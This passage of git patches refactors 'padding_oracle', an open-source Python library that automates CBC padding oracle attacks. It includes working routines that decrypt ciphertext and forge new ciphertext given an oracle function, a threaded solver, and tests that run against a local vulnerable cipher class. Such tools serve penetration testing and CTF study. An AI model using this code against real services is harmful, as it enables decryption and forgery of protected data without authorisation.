INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. -''' - -import logging -import traceback -from typing import List, Union - -from .encoding import to_bytes -from .solve import ( - solve, Fail, OracleFunc, ResultType, - convert_to_bytes, remove_padding, add_padding) - -__all__ = [ - 'padding_oracle', -] - - -def padding_oracle(payload: Union[bytes, str], - block_size: int, - oracle: OracleFunc, - num_threads: int = 1, - log_level: int = logging.INFO, - null_byte: bytes = b' ', - return_raw: bool = False, - mode: Union[bool, str] = 'decrypt', - pad_payload: bool = True - ) -> Union[bytes, List[int]]: - ''' - Run padding oracle attack to decrypt ciphertext given a function to check - wether the ciphertext can be decrypted successfully. - - Args: - payload (bytes|str) the payload you want to encrypt/decrypt - block_size (int) block size (the ciphertext length should be - multiple of this) - oracle (function) a function: oracle(ciphertext: bytes) -> bool - num_threads (int) how many oracle functions will be run in - parallel (default: 1) - log_level (int) log level (default: logging.INFO) - null_byte (bytes|str) the default byte when plaintext are not - set (default: None) - return_raw (bool) do not convert plaintext into bytes and - unpad (default: False) - mode (str) encrypt the payload (defaut: 'decrypt') - pad_payload (bool) PKCS#7 pad the supplied payload before - encryption (default: True) - - - Returns: - result (bytes|List[int]) the processed payload - ''' - - # Check args - if not callable(oracle): - raise TypeError('the oracle function should be callable') - if not isinstance(payload, (bytes, str)): - raise TypeError('payload should have type bytes') - if not isinstance(block_size, int): - raise TypeError('block_size should have type int') - if not 1 <= num_threads <= 1000: - raise ValueError('num_threads should be in [1, 1000]') - if not isinstance(null_byte, (bytes, str)): - raise TypeError('expect null with type bytes or str') - if not len(null_byte) == 1: - raise ValueError('null byte should have length of 1') - if not isinstance(mode, str): - raise TypeError('expect mode with type str') - if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'): - raise ValueError('mode must be either encrypt or decrypt') - if (mode == 'decrypt') and not (len(payload) % block_size == 0): - raise ValueError('for decryption payload length should be multiple of block size') - logger = get_logger() - logger.setLevel(log_level) - - payload = to_bytes(payload) - null_byte = to_bytes(null_byte) - - # Does the user want the encryption routine - if (mode == 'encrypt'): - return encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger) - - # If not continue with decryption as normal - return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) - - -def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): - # Wrapper to handle exceptions from the oracle function - def wrapped_oracle(ciphertext: bytes): - try: - return oracle(ciphertext) - except Exception as e: - logger.error(f'error in oracle with {ciphertext!r}, {e}') - logger.debug('error details: {}'.format(traceback.format_exc())) - return False - - def result_callback(result: ResultType): - if isinstance(result, Fail): - if result.is_critical: - logger.critical(result.message) - else: - logger.error(result.message) - - def plaintext_callback(plaintext: bytes): - plaintext = convert_to_bytes(plaintext, null_byte) - logger.info(f'plaintext: {plaintext}') - - plaintext = solve(payload, block_size, wrapped_oracle, num_threads, - result_callback, plaintext_callback) - - if not return_raw: - plaintext = convert_to_bytes(plaintext, null_byte) - plaintext = remove_padding(plaintext) - - return plaintext - - -def encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger): - # Wrapper to handle exceptions from the oracle function - def wrapped_oracle(ciphertext: bytes): - try: - return oracle(ciphertext) - except Exception as e: - logger.error(f'error in oracle with {ciphertext!r}, {e}') - logger.debug('error details: {}'.format(traceback.format_exc())) - return False - - def result_callback(result: ResultType): - if isinstance(result, Fail): - if result.is_critical: - logger.critical(result.message) - else: - logger.error(result.message) - - def plaintext_callback(plaintext: bytes): - plaintext = convert_to_bytes(plaintext, null_byte).strip(null_byte) - bytes_done = str(len(plaintext)).rjust(len(str(block_size)), ' ') - blocks_done = solve_index.rjust(len(block_total), ' ') - printout = "{0}/{1} bytes encrypted in block {2}/{3}".format(bytes_done, block_size, blocks_done, block_total) - logger.info(printout) - - def blocks(data: bytes): - return [data[index:(index+block_size)] for index in range(0, len(data), block_size)] - - def bytes_xor(byte_string_1: bytes, byte_string_2: bytes): - return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)]) - - if pad_payload: - payload = add_padding(payload, block_size) - - if len(payload) % block_size != 0: - raise ValueError('''For encryption payload length must be a multiple of blocksize. Perhaps you meant to - pad the payload (inbuilt PKCS#7 padding can be enabled by setting pad_payload=True)''') - - plaintext_blocks = blocks(payload) - ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)] - - solve_index = '1' - block_total = str(len(plaintext_blocks)) - - for index in range(len(plaintext_blocks)-1, -1, -1): - plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle, - num_threads, result_callback, plaintext_callback) - ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext) - solve_index = str(int(solve_index)+1) - - ciphertext = b''.join(ciphertext_blocks) - logger.info(f"forged ciphertext: {ciphertext}") - - return ciphertext - - -def get_logger(): - logger = logging.getLogger('padding_oracle') - formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s') - handler = logging.StreamHandler() - handler.setFormatter(formatter) - logger.addHandler(handler) - return logger diff --git a/src/padding_oracle/logger.py b/src/padding_oracle/logger.py new file mode 100644 index 0000000..9b8c014 --- /dev/null +++ b/src/padding_oracle/logger.py @@ -0,0 +1,39 @@ +''' +Copyright (c) 2022 Yuankui Li + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. +''' + +from typing import Callable + +__all__ = [ + 'Logger', + 'default_logger', + 'nop_logger', +] + +Logger = Callable[[str, str], None] + + +def default_logger(kind: str, message: str): + print(f'[{kind}] {message}') + + +def nop_logger(kind: str, message: str): + pass diff --git a/src/padding_oracle/padding_oracle.py b/src/padding_oracle/padding_oracle.py new file mode 100644 index 0000000..4a35a9b --- /dev/null +++ b/src/padding_oracle/padding_oracle.py @@ -0,0 +1,139 @@ +''' +Copyright (c) 2022 Yuankui Li + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. +''' + +import os +import threading +import traceback +import functools +from typing import Callable + +from .solve import solve, OracleFunc, BlockResult +from .logger import Logger, default_logger +from .utils import to_bytes, to_bytes_with_default, to_bytes_ensure_complete, add_padding + + +__all__ = [ + 'decrypt', + 'encrypt' +] + + +def decrypt( + ciphertext: bytes | str, + block_size: int, + oracle: OracleFunc, + num_threads: int = 1, + logger: Logger = default_logger, +) -> bytes: + + ciphertext = to_bytes(ciphertext) + assert len(ciphertext) % block_size == 0, 'ciphertext length must be a multiple of block size' + + oracle = with_exception_logger(oracle, logger) + + result = solve( + ciphertext, + block_size, + oracle, + num_threads, + block_error_logger(logger), + decrypt_progress_logger(logger), + ) + return to_bytes_ensure_complete(result) + + +def encrypt( + plaintext: bytes | str, + block_size: int, + oracle: OracleFunc, + logger: Logger = default_logger, +) -> bytes: + plaintext = to_bytes(plaintext) + plaintext = add_padding(plaintext, block_size) + + oracle = with_exception_logger(oracle, logger) + + plain_blocks = [plaintext[i:i+block_size] for i in range(0, len(plaintext), block_size)] + cipher_blocks = [os.urandom(block_size)] # in reverse order + + for i in range(len(plain_blocks)): + iv = os.urandom(block_size) + result = solve( + iv + cipher_blocks[i], + block_size, + oracle, + 1, + block_error_logger(logger), + encrypt_progress_logger(logger, i+1, len(plain_blocks)), + ) + previous_cipher_block = bytes([ + b1 ^ b2 ^ b3 + for b1, b2, b3 in zip( + iv, + to_bytes_ensure_complete(result), + plain_blocks[len(plain_blocks)-i-1], + ) + ]) + cipher_blocks.append(previous_cipher_block) + + return b''.join(reversed(cipher_blocks)) + + +def with_exception_logger(oracle: OracleFunc, logger: Logger) -> OracleFunc: + lock = threading.Lock() + + @functools.wraps(oracle) + def wrapped(payload: bytes) -> bool: + try: + return oracle(payload) + except Exception as e: + lock.acquire() # make sure these logs are not interleaved + logger('oracle_error', f'payload={payload!r} error={str(e)!r}') + logger('oracle_error_trace', '\n' + traceback.format_exc()) + finally: + if lock.locked(): + lock.release() + + return False + + return wrapped + + +def block_error_logger(logger: Logger) -> Callable[[BlockResult], None]: + def callback(result: BlockResult): + if result.error is not None: + logger('solve_block_error', result.error) + return callback + + +def decrypt_progress_logger(logger: Logger, unknown_byte: bytes = b' ') -> Callable[[bytes], None]: + def callback(incomplete_plaintext: list[int | None]): + logger('progress', f'{to_bytes_with_default(incomplete_plaintext, unknown_byte)!r}') + return callback + + +def encrypt_progress_logger(logger: Logger, blocks_done: int, blocks_total: int) -> Callable[[list[int | None]], None]: + def callback(incomplete_ciphertext: list[int | None]): + bytes_done = sum(1 for b in incomplete_ciphertext if b is not None) + bytes_total = len(incomplete_ciphertext) + logger('progress', f'block {blocks_done}/{blocks_total} encrypted {bytes_done}/{bytes_total} bytes') + return callback diff --git a/src/padding_oracle/solve.py b/src/padding_oracle/solve.py index 3cb2861..73393be 100644 --- a/src/padding_oracle/solve.py +++ b/src/padding_oracle/solve.py @@ -24,38 +24,20 @@ from concurrent.futures import ThreadPoolExecutor from collections import defaultdict from typing import ( - Optional, Union, + Optional, Awaitable, Callable, - NamedTuple, List, Dict, Set, + NamedTuple, + cast, ) -from .encoding import to_bytes - -__all__ = [ - 'solve', - 'convert_to_bytes', - 'remove_padding', - 'add_padding' -] - - -class Pass(NamedTuple): - block_index: int - solved: List[int] - - -class Fail(NamedTuple): +class BlockResult(NamedTuple): block_index: int - message: str - is_critical: bool = False + solved: list[int | None] | None = None + error: None | str = None -ResultType = Union[Pass, Fail] - OracleFunc = Callable[[bytes], bool] -ResultCallback = Callable[[ResultType], bool] -PlainTextCallback = Callable[[List[int]], bool] class Context(NamedTuple): @@ -65,71 +47,83 @@ class Context(NamedTuple): executor: ThreadPoolExecutor loop: asyncio.AbstractEventLoop - tasks: Set[Awaitable[ResultType]] - - solved_counts: Dict[int, int] - plaintext: List[int] + tasks: set[Awaitable[BlockResult]] - result_callback: ResultCallback - plaintext_callback: PlainTextCallback + solved_counts: dict[int, int] + plaintext: list[int | None] + block_callback: Callable[[BlockResult], None] + progress_callback: Callable[[list[int | None]], None] -def dummy_callback(*a, **ka): - pass - -def solve(ciphertext: bytes, - block_size: int, - oracle: OracleFunc, - parallel: int = 1, - result_callback: ResultCallback = dummy_callback, - plaintext_callback: PlainTextCallback = dummy_callback, - ) -> List[int]: +def solve( + ciphertext: bytes, + block_size: int, + oracle: OracleFunc, + parallel: int, + block_callback: Callable[[BlockResult], None], + progress_callback: Callable[[list[int | None]], None], +) -> list[int | None]: loop = asyncio.new_event_loop() - future = solve_async(ciphertext, block_size, oracle, parallel, - result_callback, plaintext_callback) + future = solve_async( + ciphertext, + block_size, + oracle, + parallel, + block_callback, + progress_callback, + ) + return loop.run_until_complete(future) -async def solve_async(ciphertext: bytes, - block_size: int, - oracle: OracleFunc, - parallel: int = 1, - result_callback: ResultCallback = dummy_callback, - plaintext_callback: PlainTextCallback = dummy_callback, - ) -> List[int]: +async def solve_async( + ciphertext: bytes, + block_size: int, + oracle: OracleFunc, + parallel: int, + block_callback: Callable[[BlockResult], None], + progess_callback: Callable[[list[int | None]], None], +) -> list[int | None]: ciphertext = list(ciphertext) - - if not len(ciphertext) % block_size == 0: - raise ValueError('ciphertext length must be a multiple of block_size') - if not len(ciphertext) // block_size > 1: - raise ValueError('cannot solve with only one block') - - ctx = create_solve_context(ciphertext, block_size, oracle, parallel, - result_callback, plaintext_callback) + assert len(ciphertext) % block_size == 0 + assert len(ciphertext) // block_size > 1 + + ctx = create_solve_context( + ciphertext, + block_size, + oracle, + parallel, + block_callback, + progess_callback, + ) while True: - done_tasks, _ = await asyncio.wait(ctx.tasks, - return_when=asyncio.FIRST_COMPLETED) + done_tasks, _ = await asyncio.wait( + ctx.tasks, + return_when=asyncio.FIRST_COMPLETED, + ) - for task in done_tasks: + for task in cast(set[Awaitable[BlockResult]], done_tasks): result = await task - ctx.result_callback(result) + ctx.block_callback(result) ctx.tasks.remove(task) - if isinstance(result, Pass): - if len(result.solved) >= ctx.solved_counts[result.block_index]: - update_plaintext(ctx, result.block_index, result.solved) - ctx.solved_counts[result.block_index] = len(result.solved) - ctx.plaintext_callback(ctx.plaintext) + if result.solved is None: + continue + + if len(result.solved) >= ctx.solved_counts[result.block_index]: + update_solved(ctx, result.block_index, result.solved) + ctx.solved_counts[result.block_index] = len(result.solved) + ctx.progress_callback(list[int | None](ctx.plaintext)) if len(ctx.tasks) == 0: break - # Check if any block failed + # Check if any block failed. error_block_indices = set() for i, byte in enumerate(ctx.plaintext): @@ -137,13 +131,19 @@ async def solve_async(ciphertext: bytes, error_block_indices.add(i // block_size + 1) for idx in error_block_indices: - result_callback(Fail(idx, f'cannot decrypt cipher block {idx}', True)) + block_callback(BlockResult(idx, error=f'block {idx} not solved')) - return ctx.plaintext + return list[int | None](ctx.plaintext) -def create_solve_context(ciphertext, block_size, oracle, parallel, - result_callback, plaintext_callback) -> Context: +def create_solve_context( + ciphertext: bytes, + block_size: int, + oracle: OracleFunc, + parallel: int, + block_callback: Callable[[BlockResult], None], + progress_callback: Callable[[list[int | None]], None], +) -> Context: tasks = set() cipher_blocks = [] @@ -156,25 +156,33 @@ def create_solve_context(ciphertext, block_size, oracle, parallel, executor = ThreadPoolExecutor(parallel) loop = asyncio.get_event_loop() - ctx = Context(block_size, oracle, executor, loop, tasks, - solved_counts, plaintext, - result_callback, plaintext_callback) - - for i in range(1, len(cipher_blocks)): - add_solve_block_task(ctx, i, cipher_blocks[i-1], cipher_blocks[i], []) + ctx = Context( + block_size, + oracle, + executor, + loop, + tasks, + solved_counts, + plaintext, + block_callback, + progress_callback, + ) + + for i in range(len(cipher_blocks)-1): + add_solve_block_task(ctx, i+1, cipher_blocks[i], cipher_blocks[i+1], []) return ctx -def add_solve_block_task(ctx: Context, block_index: int, C0: List[int], - C1: List[int], X1_suffix: List[int]): +def add_solve_block_task(ctx: Context, block_index: int, C0: list[int], + C1: list[int], X1_suffix: list[int]): future = solve_block(ctx, block_index, C0, C1, X1_suffix) task = ctx.loop.create_task(future) ctx.tasks.add(task) -async def solve_block(ctx: Context, block_index: int, C0: List[int], - C1: List[int], X1_suffix: List[int] = []) -> ResultType: +async def solve_block(ctx: Context, block_index: int, C0: list[int], + C1: list[int], X1_suffix: list[int] = []) -> BlockResult: assert len(C0) == ctx.block_size assert len(C1) == ctx.block_size @@ -187,15 +195,15 @@ async def solve_block(ctx: Context, block_index: int, C0: List[int], if len(P1_suffix) < ctx.block_size: result = await exploit_oracle(ctx, block_index, C0, C1, X1_suffix) - if isinstance(result, Fail): + if result is not None and result.error is not None: return result - return Pass(block_index, P1_suffix) + return BlockResult(block_index, P1_suffix) async def exploit_oracle(ctx: Context, block_index: int, - C0: List[int], C1: List[int], - X1_suffix: List[int]) -> Optional[Fail]: + C0: list[int], C1: list[int], + X1_suffix: list[int]) -> Optional[BlockResult]: index = ctx.block_size - len(X1_suffix) - 1 padding = len(X1_suffix) + 1 @@ -204,21 +212,24 @@ async def exploit_oracle(ctx: Context, block_index: int, C0_test[-i-1] = X1_suffix[-i-1] ^ padding hits = list(await get_oracle_hits(ctx, C0_test, C1, index)) - # Check if the number of hits is invalid + # Check if the number of hits is invalid. invalid = len(X1_suffix) == 0 and len(hits) not in (1, 2) invalid |= len(X1_suffix) > 0 and len(hits) != 1 if invalid: - message = f'invalid number of hits: {len(hits)}' - message = f'{message} (block: {block_index}, byte: {index})' - return Fail(block_index, message) + message = f'invalid number of hits: {len(hits)} (block: {block_index}, byte: {index})' + return BlockResult(block_index, message) for byte in hits: X1_test = [byte ^ padding, *X1_suffix] add_solve_block_task(ctx, block_index, C0, C1, X1_test) -async def get_oracle_hits(ctx: Context, C0: List[int], C1: List[int], - index: int): +async def get_oracle_hits( + ctx: Context, + C0: list[int], + C1: list[int], + index: int, +) -> list[int]: C0 = C0.copy() futures = {} @@ -239,39 +250,7 @@ async def get_oracle_hits(ctx: Context, C0: List[int], C1: List[int], return hits -def update_plaintext(ctx: Context, block_index: int, solved_suffix: List[int]): +def update_solved(ctx: Context, block_index: int, solved_suffix: list[int]): j = block_index * ctx.block_size i = j - len(solved_suffix) ctx.plaintext[i:j] = solved_suffix - - -def convert_to_bytes(byte_list: List[int], replacement=b' '): - ''' - Convert a list of int into bytes, replace invalid byte with replacement. - ''' - for i, byte in enumerate(list(byte_list)): - if isinstance(byte, int) and byte in range(256): - pass - elif isinstance(byte, bytes): - byte = ord(byte) - else: - byte = ord(replacement) - byte_list[i] = byte - return bytes(byte_list) - - -def remove_padding(data: Union[str, bytes, List[int]]) -> bytes: - ''' - Remove PKCS#7 padding bytes. - ''' - data = to_bytes(data) - return data[:-data[-1]] - - -def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes: - ''' - Add PKCS#7 padding bytes. - ''' - data = to_bytes(data) - pad_len = block_size - len(data) % block_size - return data + (bytes([pad_len]) * pad_len) diff --git a/src/padding_oracle/encoding.py b/src/padding_oracle/utils.py similarity index 61% rename from src/padding_oracle/encoding.py rename to src/padding_oracle/utils.py index 5e91625..9f0814a 100644 --- a/src/padding_oracle/encoding.py +++ b/src/padding_oracle/utils.py @@ -22,16 +22,15 @@ import base64 import urllib.parse -from typing import List, Union __all__ = [ + 'to_bytes', 'to_str', 'base64_encode', 'base64_decode', 'urlencode', 'urldecode', - 'to_bytes', 'to_str' ] -def to_bytes(data: Union[str, bytes, List[int]]) -> bytes: +def to_bytes(data: str | bytes | list[int]) -> bytes: if isinstance(data, str): data = data.encode() elif isinstance(data, list): @@ -40,7 +39,18 @@ def to_bytes(data: Union[str, bytes, List[int]]) -> bytes: return data -def to_str(data: Union[str, bytes, List[int]]) -> str: +def to_bytes_with_default(maybe_bytes: list[int | None], default: bytes = b' ') -> bytes: + return [default if b is None else b for b in maybe_bytes] + + +def to_bytes_ensure_complete(maybe_bytes: list[int | None]) -> bytes: + for b in maybe_bytes: + assert b is not None + assert isinstance(b, int) and b in range(256) + return bytes(maybe_bytes) + + +def to_str(data: str | bytes | list[int]) -> str: if isinstance(data, list): data = bytes(data) if isinstance(data, bytes): @@ -52,21 +62,38 @@ def to_str(data: Union[str, bytes, List[int]]) -> str: return data -def base64_decode(data: Union[str, bytes, List[int]]) -> bytes: +def base64_decode(data: str | bytes | list[int]) -> bytes: data = to_bytes(data) return base64.b64decode(data) -def base64_encode(data: Union[str, bytes, List[int]]) -> str: +def base64_encode(data: str | bytes | list[int]) -> str: data = to_bytes(data) return base64.b64encode(data).decode() -def urlencode(data: Union[str, bytes, List[int]]) -> str: +def urlencode(data: str | bytes | list[int]) -> str: data = to_bytes(data) return urllib.parse.quote(data) -def urldecode(data: Union[str, bytes, List[int]]) -> bytes: +def urldecode(data: str | bytes | list[int]) -> bytes: data = to_str(data) return urllib.parse.unquote_plus(data) + + +def remove_padding(data: str | bytes | list[int]) -> bytes: + ''' + Remove PKCS#7 padding bytes. + ''' + data = to_bytes(data) + return data[:-data[-1]] + + +def add_padding(data: str | bytes | list[int], block_size: int) -> bytes: + ''' + Add PKCS#7 padding bytes. + ''' + data = to_bytes(data) + pad_len = block_size - len(data) % block_size + return data + (bytes([pad_len]) * pad_len) diff --git a/tests/test_padding_oracle.py b/tests/test_padding_oracle.py index 95a8f25..ab78a39 100644 --- a/tests/test_padding_oracle.py +++ b/tests/test_padding_oracle.py @@ -1,32 +1,37 @@ -from cryptography.hazmat.primitives import padding -from padding_oracle import padding_oracle +from padding_oracle import decrypt, encrypt, remove_padding from .cryptor import VulnerableCryptor -def test_padding_oracle_basic(): - cryptor = VulnerableCryptor() - +def test_padding_oracle_decrypt(): plaintext = b'the quick brown fox jumps over the lazy dog' + + cryptor = VulnerableCryptor() ciphertext = cryptor.encrypt(plaintext) - decrypted = padding_oracle(ciphertext, cryptor.block_size, - cryptor.oracle, 4, null_byte=b'?') - print(decrypted) + decrypted = decrypt( + ciphertext, + cryptor.block_size, + cryptor.oracle, + num_threads=4, + ) - assert decrypted == plaintext + assert remove_padding(decrypted) == plaintext -def test_padding_oracle_encryption(): - cryptor = VulnerableCryptor() +def test_padding_oracle_encrypt(): plaintext = b'the quick brown fox jumps over the lazy dog' - ciphertext = cryptor.encrypt(plaintext) - encrypted = padding_oracle(plaintext, cryptor.block_size, - cryptor.oracle, 4, null_byte=b'?', mode='encrypt') - decrypted = cryptor.decrypt(encrypted) + cryptor = VulnerableCryptor() + + encrypted = encrypt( + plaintext, + cryptor.block_size, + cryptor.oracle, + ) + + assert cryptor.decrypt(encrypted) == plaintext - assert decrypted == plaintext if __name__ == '__main__': - test_padding_oracle_basic() - test_padding_oracle_encryption() + test_padding_oracle_decrypt() + test_padding_oracle_encrypt() diff --git a/tests/test_solve.py b/tests/test_solve.py index ce33860..e470a5e 100644 --- a/tests/test_solve.py +++ b/tests/test_solve.py @@ -2,8 +2,7 @@ import os import multiprocessing as mp -from padding_oracle import remove_padding -from padding_oracle.solve import solve +from padding_oracle import solve, remove_padding from .cryptor import VulnerableCryptor VERBOSE = False @@ -15,10 +14,19 @@ def _test_solve(data_size): plaintext = os.urandom(data_size) ciphertext = crypter.encrypt(plaintext) - decrypted = solve(list(ciphertext), crypter.block_size, crypter.oracle) - decrypted = remove_padding(decrypted) + def nop_callback(*args, **kwargs): + pass - assert plaintext == decrypted, 'decryption failed' + solved = solve( + ciphertext, + crypter.block_size, + crypter.oracle, + parallel=4, + block_callback=nop_callback, + progress_callback=nop_callback, + ) + + assert plaintext == remove_padding(solved), 'decryption failed' def test_solve_basic(): From 1bf660fcc81a1af3d0bb6b2eef86b7ee1a184b72 Mon Sep 17 00:00:00 2001 From: djosix Date: Sat, 18 Nov 2023 08:21:24 +0800 Subject: [PATCH 09/10] support only python>=3.10 --- .github/workflows/python-package.yml | 2 +- pyproject.toml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml index 8dc4d12..f6319fa 100644 --- a/.github/workflows/python-package.yml +++ b/.github/workflows/python-package.yml @@ -16,7 +16,7 @@ jobs: strategy: fail-fast: false matrix: - python-version: ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] + python-version: ["3.10", "3.11", "3.12"] steps: - uses: actions/checkout@v3 diff --git a/pyproject.toml b/pyproject.toml index 90f2377..909bbb7 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -4,13 +4,13 @@ build-backend = "hatchling.build" [project] name = "padding_oracle" -version = "0.3.2" +version = "0.4.0" authors = [ { name="Yuankui Li", email="toregnerate@gmail.com" }, ] description = "Threaded padding oracle automation." readme = "README.md" -requires-python = ">=3.7" +requires-python = ">=3.10" classifiers = [ 'Programming Language :: Python :: 3', 'License :: OSI Approved :: MIT License', From 0a34ab1ce10ed3420cc547f8fa4017c8c456cf90 Mon Sep 17 00:00:00 2001 From: djosix Date: Sat, 18 Nov 2023 08:23:14 +0800 Subject: [PATCH 10/10] update copyright year --- src/padding_oracle/__init__.py | 2 +- src/padding_oracle/logger.py | 2 +- src/padding_oracle/padding_oracle.py | 2 +- src/padding_oracle/solve.py | 2 +- src/padding_oracle/utils.py | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/src/padding_oracle/__init__.py b/src/padding_oracle/__init__.py index 8caf522..58fd0e5 100644 --- a/src/padding_oracle/__init__.py +++ b/src/padding_oracle/__init__.py @@ -1,5 +1,5 @@ ''' -Copyright (c) 2022 Yuankui Li +Copyright (c) 2023 Yuankui Li Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/src/padding_oracle/logger.py b/src/padding_oracle/logger.py index 9b8c014..8f95ccd 100644 --- a/src/padding_oracle/logger.py +++ b/src/padding_oracle/logger.py @@ -1,5 +1,5 @@ ''' -Copyright (c) 2022 Yuankui Li +Copyright (c) 2023 Yuankui Li Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/src/padding_oracle/padding_oracle.py b/src/padding_oracle/padding_oracle.py index 4a35a9b..5cb32af 100644 --- a/src/padding_oracle/padding_oracle.py +++ b/src/padding_oracle/padding_oracle.py @@ -1,5 +1,5 @@ ''' -Copyright (c) 2022 Yuankui Li +Copyright (c) 2023 Yuankui Li Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/src/padding_oracle/solve.py b/src/padding_oracle/solve.py index 73393be..2c3a3f2 100644 --- a/src/padding_oracle/solve.py +++ b/src/padding_oracle/solve.py @@ -1,5 +1,5 @@ ''' -Copyright (c) 2022 Yuankui Li +Copyright (c) 2023 Yuankui Li Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/src/padding_oracle/utils.py b/src/padding_oracle/utils.py index 9f0814a..a5b73f0 100644 --- a/src/padding_oracle/utils.py +++ b/src/padding_oracle/utils.py @@ -1,5 +1,5 @@ ''' -Copyright (c) 2022 Yuankui Li +Copyright (c) 2023 Yuankui Li Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal